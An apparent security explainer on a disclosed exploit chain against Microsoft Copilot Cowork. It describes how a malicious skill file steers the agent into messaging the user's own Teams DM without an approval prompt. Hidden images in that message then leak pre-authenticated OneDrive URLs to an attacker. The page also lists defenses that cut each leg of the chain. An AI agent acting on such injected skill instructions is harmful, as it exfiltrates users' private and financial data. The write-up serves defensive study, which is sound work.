Copilot Cowork — Image-URL exfiltration
AgentThe news. On May 25, 2026, PromptArmor disclosed the chained exploit against Microsoft Copilot Cowork. Three weaknesses compose: a malicious skill file functions as untrusted input the agent acts on; when the message recipient is the active user, the agent bypasses the normal approval gate; the hidden image fetches in the Teams renderer leak the pre-authenticated download URLs to the attacker. The attacker then uses those URLs to pull PII and financial data from OneDrive. Simon Willison's write-up calls it a textbook lethal-trifecta failure in a shipped product.
Picture the e-card metaphor for a moment. Your assistant sends e-cards from your account every morning, addressed to you — a friendly daily summary. Someone uploads a card template into your assistant's library that has a one-pixel tracking image stitched into the bottom of the design. You don't see the pixel; you don't need to. The moment you sit down and open your inbox to read the day's card, your mail viewer dutifully fetches every embedded image — and the URL the pixel points at carries your home address packed into the query string. The pixel's "server" is across town, run by whoever uploaded the card. They never had to break into your house. They wrote the address in invisible ink on the back of a card you, via your assistant, signed for delivery to yourself.
That is the structural shape of what PromptArmor demonstrated. The malicious skill file is the attacker-controlled input — analogous to the rigged card template. The agent (Copilot Cowork) is the assistant; it reads the skill file, then composes the message it was instructed to compose. The active-user gate bypass is what makes the e-card auto-deliver without you reviewing it — Copilot Cowork's authors decided that messages from you to you don't need an approval prompt, which is reasonable for "remind me at 9am" and catastrophic when the message body comes from a tool-as-an-attack-surface. The OneDrive pre-authenticated URL is the secret packed into the pixel — once the URL is logged at the attacker's server, the attacker can hit OneDrive directly with it. The Teams renderer is the pixel-loader doing exactly what it's designed to do: auto-fetching every <img> in the message so the inbox previews correctly.
The under-appreciated piece is that the renderer is the outbound channel, not the agent. Defenders typically scope agent capabilities — "the agent may only call tool X with arguments from allowlist Y" — and assume that any covert outbound traffic must come from a tool invocation. Image-URL exfiltration bypasses that frame entirely. The agent's only "action" was write a benign-looking message to the user's own inbox. The illicit HTTP request was issued by a different process (Teams), in a different trust context (the user's mail client), on behalf of a third actor (the renderer's image preloader). Three weaknesses, none of them individually surprising; chained together, a data-flow graph that closes around the user's data.
Where the exploit chain earns its rent
Hold three knobs fixed and count interactions. The target user installs (illustrative) 1 malicious skill into Copilot Cowork (the user trusted the skill author; the skill's manifest looked innocent). The user does not click anything during the exploit window. PromptArmor's chain then requires exactly 1 inbox post from the agent to the user's own Teams DM (active-user bypass — no approval prompt), 1 image auto-fetch by the Teams renderer (carries the pre-auth URL into the attacker's HTTP log), and 1 OneDrive download by the attacker using the now-logged URL. That's 0 user clicks · 1 auto-fetch · 1 file leaked — the headline the hero animation lands on.
The asymmetry is the part to internalize. The exploit only completes when all three legs remain intact — the attacker needs the malicious skill in the upload path, the active-user message path open, AND the renderer auto-fetching arbitrary external URLs. The defender, by contrast, only needs to cut one leg to break the chain — a signed-skill allowlist, capability scoping that redacts URLs from the agent's context, OR a renderer URL allowlist. The math favors the defender; the disclosure is a reminder that none of the three legs is plugged by default in a stock Cowork deployment.
| Trifecta leg | How this exploit uses it | Defense that would cut this leg |
|---|---|---|
| Untrusted input | Malicious skill file uploaded into Copilot Cowork's skill store; the agent reads it and treats its content as instructions (per PromptArmor disclosure) | Skill-file static analysis + signed-skill allowlist (input filters) — see Agent Engineering → Guardrails → Input filters |
| Private data access | Agent reads a OneDrive file and obtains a pre-authenticated download URL — bearer-token URLs are the leak surface, not the file itself | Capability scoping — never let the agent see raw URLs; mediate every download through a tool that drops the token before composing replies |
| Outbound channel | Teams renderer auto-fetches every inline <img src>, carrying the URL (and embedded token) into the attacker's HTTP log (no user click required) | Renderer-side URL allowlist + image proxy: refuse any inline image whose origin isn't on the org's allowlist — see Cut a Leg |
A small but load-bearing caveat: this isn't a Copilot-Cowork-specific bug — it's a deployed-product instance of a known pattern. The same shape applies to any agent UI that (a) accepts user-installable skill-like inputs, (b) renders inline images without origin checks, and (c) has any code path where an agent can compose a message the user's renderer will later auto-load. Teams is the renderer here because Cowork posts there; many messaging and email renderers can create similar risk when they auto-fetch external images on display. The fix is structural — a renderer URL allowlist and a layered guardrail that scrubs URLs before any message reaches a renderer — not a Cowork patch.
Goes deeper in: AI Agents → Security & the Lethal Trifecta → Output Exfiltration
Related explainers
- Camouflage Injection paper — Detection-gap for prompt injection — the detector-side weakness that lets a skill-file injection pass at upload time
- Boiling the Frog — Multi-turn agent norm erosion — a different attack class against the same trifecta surface
- MCP SEP-2468 — RFC 9207 iss parameter for OAuth mix-up — adjacent agent-platform vulnerability that also fixes via structural defense, not policy